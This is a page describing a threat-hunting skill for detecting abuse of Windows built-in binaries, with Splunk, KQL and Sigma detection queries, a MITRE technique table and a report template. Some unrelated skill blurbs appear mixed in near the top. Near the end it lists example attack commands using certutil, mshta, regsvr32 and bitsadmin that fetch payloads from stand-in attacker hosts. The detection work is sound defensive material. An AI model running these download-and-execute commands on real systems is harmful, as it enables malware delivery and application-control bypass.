From cybersecurity-skills
Detects LOLBin abuse in endpoint process logs by hunting suspicious executions of Windows binaries like certutil, mshta, rundll32, regsvr32 for defense evasion (MITRE T1218).
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsThis skill uses the workspace's default tool permissions.
- When hunting for fileless attack techniques that abuse built-in Windows binaries
Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.
Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.
Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.
-urlcache -decode -encode, mshta with URL arguments, rundll32 loading DLLs from temp/user directories, regsvr32 with /s /n /u /i:URL.| Concept | Description |
|---|---|
| T1218 | System Binary Proxy Execution |
| T1218.001 | Compiled HTML File (mshta.exe) |
| T1218.003 | CMSTP |
| T1218.005 | Mshta |
| T1218.010 | Regsvr32 (Squiblydoo) |
| T1218.011 | Rundll32 |
| T1127.001 | MSBuild |
| T1197 | BITS Jobs (bitsadmin.exe) |
| T1140 | Deobfuscate/Decode Files (certutil.exe) |
| T1059.001 | PowerShell |
| T1059.005 | Visual Basic (wscript/cscript) |
| LOLBAS | Living Off the Land Binaries, Scripts and Libraries project |
| Tool | Purpose |
|---|---|
| Sysmon | Process creation with command-line and hash logging |
| CrowdStrike Falcon | EDR with LOLBin detection analytics |
| Microsoft Defender for Endpoint | Built-in LOLBin abuse detection |
| Splunk | SPL-based process hunting and anomaly detection |
| Elastic Security | Pre-built LOLBin detection rules |
| LOLBAS Project | Reference database of LOLBin abuse techniques |
| Sigma Rules | Community detection rules for LOLBin abuse |
index=sysmon EventCode=1
| where match(Image, "(?i)(certutil|mshta|rundll32|regsvr32|msbuild|installutil|cmstp|bitsadmin)\.exe$")
| eval suspicious=case(
match(CommandLine, "(?i)certutil.*(-urlcache|-decode|-encode)"), "certutil_download_decode",
match(CommandLine, "(?i)mshta.*(http|https|javascript|vbscript)"), "mshta_remote_exec",
match(CommandLine, "(?i)rundll32.*\\\\(temp|appdata|users)"), "rundll32_unusual_dll",
match(CommandLine, "(?i)regsvr32.*/s.*/n.*/u.*/i:"), "regsvr32_squiblydoo",
match(CommandLine, "(?i)msbuild.*\\\\(temp|appdata|users)"), "msbuild_unusual_project",
match(CommandLine, "(?i)bitsadmin.*/transfer"), "bitsadmin_download",
match(CommandLine, "(?i)cmstp.*/s.*/ni"), "cmstp_uac_bypass",
1=1, "normal"
)
| where suspicious!="normal"
| table _time Computer User Image CommandLine ParentImage ParentCommandLine suspicious
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
"msbuild.exe", "installutil.exe", "cmstp.exe", "bitsadmin.exe")
| where ProcessCommandLine matches regex @"(?i)(urlcache|decode|encode|http://|https://|javascript:|vbscript:|/s\s+/n|/transfer)"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
title: Suspicious LOLBin Execution with Malicious Arguments
status: experimental
logsource:
category: process_creation
product: windows
detection:
selection_certutil:
Image|endswith: '\certutil.exe'
CommandLine|contains:
- '-urlcache'
- '-decode'
- '-encode'
selection_mshta:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'http://'
- 'https://'
- 'javascript:'
selection_regsvr32:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|all:
- '/s'
- '/i:'
condition: 1 of selection_*
level: high
tags:
- attack.defense_evasion
- attack.t1218
certutil.exe -urlcache -split -f http://malicious.com/payload.exe %TEMP%\payload.exe used to download malware bypassing proxy filters.mshta.exe http://attacker.com/malicious.hta executing remote HTA files containing VBScript or JScript payloads.regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll executing remote SCT files to bypass application whitelisting.rundll32.exe C:\Users\user\AppData\Local\Temp\malicious.dll,EntryPoint executing attacker DLLs via legitimate binary.msbuild.exe C:\Temp\malicious.csproj executing C# code embedded in project files to bypass application control.bitsadmin /transfer job /download /priority high http://attacker.com/malware.exe C:\Temp\update.exe using BITS service for stealthy file download.wmic process list /format:evil.xsl executing JScript/VBScript from XSL stylesheets.Hunt ID: TH-LOLBIN-[DATE]-[SEQ]
Host: [Hostname]
User: [Account context]
LOLBin: [Binary name]
Full Path: [Execution path]
Command Line: [Full arguments]
Parent Process: [Parent image and command line]
Detection Category: [download_cradle/proxy_exec/uac_bypass/applocker_bypass]
Network Activity: [Yes/No -- destination if applicable]
Risk Level: [Critical/High/Medium/Low]